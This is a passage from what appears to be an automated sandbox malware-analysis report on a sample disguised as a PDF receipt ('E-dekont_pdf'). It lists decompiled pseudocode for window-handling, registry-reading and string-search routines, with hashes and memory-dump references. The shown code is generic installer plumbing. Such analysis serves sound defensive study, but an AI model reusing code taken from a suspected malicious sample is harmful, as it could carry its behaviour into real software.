                                                                                              • Associated: 00000001.00000002.77085083526.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000561000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085727384.0000000000571000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                              • String ID: 4?v.?v
                                                                                              • API String ID: 3248276644-1168731058
                                                                                              • Opcode ID: 77afb20a399829901eeb2616cf50406cf80fbc104d036c9dbef5b1c8f04b69ca
                                                                                              • Instruction ID: 0737f55430a313993fa73fc83ee1aa9f84f264a9a856b81b34839b93064caae8
                                                                                              • Opcode Fuzzy Hash: 77afb20a399829901eeb2616cf50406cf80fbc104d036c9dbef5b1c8f04b69ca
                                                                                              • Instruction Fuzzy Hash: CDF07D26145A1215E621B2350C05BAF05158F82314B07063FFD53B22E1DF3C8973C53E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040563E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 89%
                                                                                              			E0040563E(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x446734 != _t16) {
							_push(_t16);
							_push(6);
							 *0x446734 = _t16;
							E00404FFF();
						}
						L11:
						return CallWindowProcW( *0x44673c, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404F7F(_a4, "true");
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00404610(0x413);
				return 0;
			}





                                                                                              0x00405642
                                                                                              0x0040564c
                                                                                              0x00405668
                                                                                              0x0040568a
                                                                                              0x0040568d
                                                                                              0x00405693
                                                                                              0x0040569d
                                                                                              0x0040569e
                                                                                              0x004056a0
                                                                                              0x004056a6
                                                                                              0x004056a6
                                                                                              0x004056b0
                                                                                              0x00000000
                                                                                              0x004056be
                                                                                              0x00405675
                                                                                              0x004056ad
                                                                                              0x004056ad
                                                                                              0x00000000
                                                                                              0x004056ad
                                                                                              0x00405681
                                                                                              0x00405683
                                                                                              0x00000000
                                                                                              0x00405683
                                                                                              0x00405652
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405659
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • IsWindowVisible.USER32(?), ref: 0040566D
                                                                                              • CallWindowProcW.USER32(?,?,?,?), ref: 004056BE
                                                                                                • Part of subcall function 00404610: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404622
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77084955068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77084926247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085042770.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000561000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085727384.0000000000571000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                                              • String ID:
                                                                                              • API String ID: 3748168415-3916222277
                                                                                              • Opcode ID: d947304be205e2ecbcca3225b28cfa45c889536dc93edbe464f15d86bb1dbb29
                                                                                              • Instruction ID: cf649f65924c36d4a7a626b4327954ac0a46d0fcc590d8dc98f085a98131112b
                                                                                              • Opcode Fuzzy Hash: d947304be205e2ecbcca3225b28cfa45c889536dc93edbe464f15d86bb1dbb29
                                                                                              • Instruction Fuzzy Hash: 4101B131100708AFEF205F11DD84A6B3A25EB85364F904837FA08752E0DB7B8C929E6E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00406536 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 90%
                                                                                              			E00406536(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x4000;
				_t21 = E004064D5(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x3ffe] = _t30[0x3ffe] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}







                                                                                              0x00406544
                                                                                              0x00406546
                                                                                              0x0040655e
                                                                                              0x00406563
                                                                                              0x00406568
                                                                                              0x004065a6
                                                                                              0x004065a6
                                                                                              0x0040656a
                                                                                              0x0040657c
                                                                                              0x00406587
                                                                                              0x0040658d
                                                                                              0x00406598
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406598
                                                                                              0x004065ac

                                                                                              APIs
                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00004000,00000000,?,00000000,?,?,Call,?,?,0040679D,80000002), ref: 0040657C
                                                                                              • RegCloseKey.ADVAPI32(?,?,0040679D,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsdECC9.tmp\System.dll), ref: 00406587
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77084955068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77084926247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085042770.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000561000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085727384.0000000000571000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseQueryValue
                                                                                              • String ID: Call
                                                                                              • API String ID: 3356406503-1824292864
                                                                                              • Opcode ID: e771cec8656827c12f1662d485b50a437d001aca335f1efdab3920d67d98be03
                                                                                              • Instruction ID: 1fbcc26cc6b857459d5a583c8ac9bd3aa1479396c6e4517460947190b04d1158
                                                                                              • Opcode Fuzzy Hash: e771cec8656827c12f1662d485b50a437d001aca335f1efdab3920d67d98be03
                                                                                              • Instruction Fuzzy Hash: C8017C72500209FADF22CF51DD09EDB3BA8EF54364F01403AFD16A2190D738DA64DBA4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004060BD Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E004060BD(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}









                                                                                              0x004060cd
                                                                                              0x004060cf
                                                                                              0x004060d2
                                                                                              0x004060fe
                                                                                              0x004060d7
                                                                                              0x004060e0
                                                                                              0x004060e5
                                                                                              0x004060f0
                                                                                              0x004060f3
                                                                                              0x0040610f
                                                                                              0x004060f5
                                                                                              0x004060fc
                                                                                              0x00000000
                                                                                              0x004060fc
                                                                                              0x00406108
                                                                                              0x0040610c
                                                                                              0x0040610c
                                                                                              0x00406106
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                                                                                              • lstrcmpiA.KERNEL32(00000000,00000000), ref: 004060E5
                                                                                              • CharNextA.USER32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060F6
                                                                                              • lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77084955068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77084926247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085042770.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000561000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085727384.0000000000571000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                                              • String ID:
                                                                                              • API String ID: 190613189-0
                                                                                              • Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                                                                              • Instruction ID: 2f06b96f93541eceebcae48a9adfe7aedd37cb678349478f8cad11de2473fd3e
                                                                                              • Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                                                                              • Instruction Fuzzy Hash: 0BF0F631104054FFDB12DFA4CD00D9EBBA8EF06350B2640BAE841FB321D674DE11A798
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%